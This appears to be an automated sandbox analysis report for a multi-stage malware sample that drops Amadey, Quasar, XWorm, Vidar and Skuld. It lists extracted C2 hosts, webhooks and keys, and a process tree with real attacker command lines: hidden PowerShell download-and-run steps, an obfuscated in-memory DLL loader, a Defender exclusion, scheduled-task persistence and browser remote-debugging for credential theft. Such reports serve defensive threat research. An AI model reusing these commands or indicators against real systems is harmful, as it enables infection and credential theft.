Overview

overview

10

Static

static

5

random.exe

windows7-x64

10

random.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/03/2025, 16:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    random.exe

  • Size

    938KB

  • MD5

    bcefbd57340b3f8c39699195c2946d69

  • SHA1

    73eb2f2c99d6a7141fc577d9375ae3992ac58b4a

  • SHA256

    8339734ef64625aea2605628510e071dccbb57941c2dd068c8b34fc859c4f2ec

  • SHA512

    a9cdc53ff3b7b5c6913353a70a268e88a61dd1a7b4ad9f2cf5657b28ff5b612cf8c20275e070c54a31acb83ea1608d273c2217e56415e1a8c0626c6b82681b9f

  • SSDEEP

    24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8a0Ju:9TvC/MTQYxsWR7a0J

Score
10/10
amadeyquasarskuldvidarxworm09215580621af4947f6f7800865a5c80d8f329telegramagilenetcredential_accessdefense_evasiondiscoveryexecutionpersistenceratspywarestealerthemidatrojanupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://196.251.91.42/up/uploads/encryption02.jpg
exe.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

skuld

C2

https://discordapp.com/api/webhooks/1349647136895012916/qSys_fpsL_y7usKH_AyrFupSjzSsVfg2t895g2HV8Yz72asrwCIsHaqqhPtDFjz8g8_E

Extracted

Family

xworm

Version

5.0

C2

httpss.myvnc.com:1907

Mutex

xWIArEKzuXpfRVkJ

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

quasar

Version

1.3.0.0

Botnet

TELEGRAM

C2

212.56.35.232:101

Mutex

QSR_MUTEX_LoEArEgGuZRG2bQs0E

Attributes
  • encryption_key

    yMvSAv7B2dURg67QYU5x

  • install_name

    svchost.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    svchosta

  • subdirectory

    media

Extracted

Family

vidar

Version

13.2

Botnet

80621af4947f6f7800865a5c80d8f329

C2

https://t.me/g_etcontent

https://steamcommunity.com/profiles/76561199832267488
Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Vidar Stealer 8 IoCs
    stealer
  • Detect Xworm Payload 2 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 7 IoCs
  • Skuld family
    skuld
  • Skuld stealer

    An info stealer written in Go lang.

    stealerskuld
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
    defense_evasion
  • Blocklisted process makes network request 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file 14 IoCs
  • Uses browser remote debugging 2 TTPs 13 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 33 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 49 IoCs
  • Obfuscated with Agile.Net obfuscator 2 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

    agilenet
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 8 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 7 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
    defense_evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 53 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 2 IoCs
    defense_evasion

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:1036
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2608
    • C:\Users\Admin\AppData\Local\Temp\random.exe
      "C:\Users\Admin\AppData\Local\Temp\random.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:212
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn 6li2qmaTRpc /tr "mshta C:\Users\Admin\AppData\Local\Temp\wWCPpV4mY.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2840
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn 6li2qmaTRpc /tr "mshta C:\Users\Admin\AppData\Local\Temp\wWCPpV4mY.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:5124
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\wWCPpV4mY.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:776
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'S4W4Z3J3ARJB3BPEZKKNYE5QUJNT3AJR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:6124
          • C:\Users\Admin\AppData\Local\TempS4W4Z3J3ARJB3BPEZKKNYE5QUJNT3AJR.EXE
            "C:\Users\Admin\AppData\Local\TempS4W4Z3J3ARJB3BPEZKKNYE5QUJNT3AJR.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4628
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1640
              • C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe
                "C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe"
                6⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:208
                • C:\Windows\system32\attrib.exe
                  attrib +h +s C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe
                  7⤵
                  • Views/modifies file attributes
                  PID:5484
              • C:\Users\Admin\AppData\Local\Temp\10286670101\zx4PJh6.exe
                "C:\Users\Admin\AppData\Local\Temp\10286670101\zx4PJh6.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1940
                • C:\Windows\SysWOW64\CMD.exe
                  "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:764
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    8⤵
                    • Enumerates processes with tasklist
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:208
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /I "opssvc wrsa"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:876
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    8⤵
                    • Enumerates processes with tasklist
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:212
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:556
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c md 440824
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:1648
                  • C:\Windows\SysWOW64\extrac32.exe
                    extrac32 /Y /E Architecture.wmv
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2896
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /V "Offensive" Inter
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:5208
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:4456
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:4784
                  • C:\Users\Admin\AppData\Local\Temp\440824\Organizations.com
                    Organizations.com h
                    8⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:4812
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 4812 -s 912
                      9⤵
                      • Program crash
                      PID:3360
                  • C:\Windows\SysWOW64\choice.exe
                    choice /d y /t 5
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:6124
              • C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe
                "C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Checks computer location settings
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks whether UAC is enabled
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3140
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\File.bat" "
                  7⤵
                  • Drops startup file
                  • System Location Discovery: System Language Discovery
                  PID:3772
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cDovLzE5Ni4yNTEuOTEuNDIvdXAvdXBsb2Fkcy9lbmNyeXB0aW9uMDIuanBn'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('httpss.myvnc.com', '1907');"
                    8⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5128
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ohbuGGy.exe"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5944
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ohbuGGy" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7421.tmp"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:4688
                • C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe
                  "C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:6080
                • C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe
                  "C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4200
                • C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe
                  "C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5880
              • C:\Users\Admin\AppData\Local\Temp\10287840101\advnrNo.exe
                "C:\Users\Admin\AppData\Local\Temp\10287840101\advnrNo.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Checks computer location settings
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                PID:4976
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  7⤵
                  • Uses browser remote debugging
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  PID:1488
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffea1adcf8,0x7fffea1add04,0x7fffea1add10
                    8⤵
                      PID:1164
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --subproc-heap-profiling --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1988,i,6449162824537753392,12342283352408990014,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1984 /prefetch:2
                      8⤵
                        PID:5724
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --subproc-heap-profiling --field-trial-handle=1484,i,6449162824537753392,12342283352408990014,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2308 /prefetch:3
                        8⤵
                          PID:5424
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --subproc-heap-profiling --field-trial-handle=2360,i,6449162824537753392,12342283352408990014,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1812 /prefetch:8
                          8⤵
                            PID:1464
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --subproc-heap-profiling --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,6449162824537753392,12342283352408990014,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3296 /prefetch:1
                            8⤵
                            • Uses browser remote debugging
                            PID:2900
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --subproc-heap-profiling --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,6449162824537753392,12342283352408990014,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3268 /prefetch:1
                            8⤵
                            • Uses browser remote debugging
                            PID:1512
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4276,i,6449162824537753392,12342283352408990014,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4308 /prefetch:2
                            8⤵
                            • Uses browser remote debugging
                            PID:4660
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --subproc-heap-profiling --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4616,i,6449162824537753392,12342283352408990014,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4624 /prefetch:1
                            8⤵
                            • Uses browser remote debugging
                            PID:4520
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5248,i,6449162824537753392,12342283352408990014,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5256 /prefetch:8
                            8⤵
                              PID:3428
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5456,i,6449162824537753392,12342283352408990014,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5468 /prefetch:8
                              8⤵
                                PID:5916
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                              7⤵
                              • Uses browser remote debugging
                              • Enumerates system info in registry
                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                              • Suspicious use of FindShellTrayWindow
                              PID:5308
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x260,0x7fffea18f208,0x7fffea18f214,0x7fffea18f220
                                8⤵
                                  PID:5328
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2204,i,11594898185444358923,4551344919286574593,262144 --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:2
                                  8⤵
                                    PID:936
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1964,i,11594898185444358923,4551344919286574593,262144 --variations-seed-version --mojo-platform-channel-handle=2252 /prefetch:3
                                    8⤵
                                      PID:5132
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1784,i,11594898185444358923,4551344919286574593,262144 --variations-seed-version --mojo-platform-channel-handle=2640 /prefetch:8
                                      8⤵
                                        PID:1396
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3540,i,11594898185444358923,4551344919286574593,262144 --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:1
                                        8⤵
                                        • Uses browser remote debugging
                                        PID:4400
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3548,i,11594898185444358923,4551344919286574593,262144 --variations-seed-version --mojo-platform-channel-handle=3668 /prefetch:1
                                        8⤵
                                        • Uses browser remote debugging
                                        PID:1624
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\ecbiw" & exit
                                      7⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4204
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /t 11
                                        8⤵
                                        • System Location Discovery: System Language Discovery
                                        • Delays execution with timeout.exe
                                        PID:3620
                                  • C:\Users\Admin\AppData\Local\Temp\10287990101\wjfOfXh.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10287990101\wjfOfXh.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:5884
                                  • C:\Users\Admin\AppData\Local\Temp\10288540101\4wAPcC0.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10288540101\4wAPcC0.exe"
                                    6⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:6064
                                    • C:\Users\Admin\AppData\Roaming\media\svchost.exe
                                      "C:\Users\Admin\AppData\Roaming\media\svchost.exe"
                                      7⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
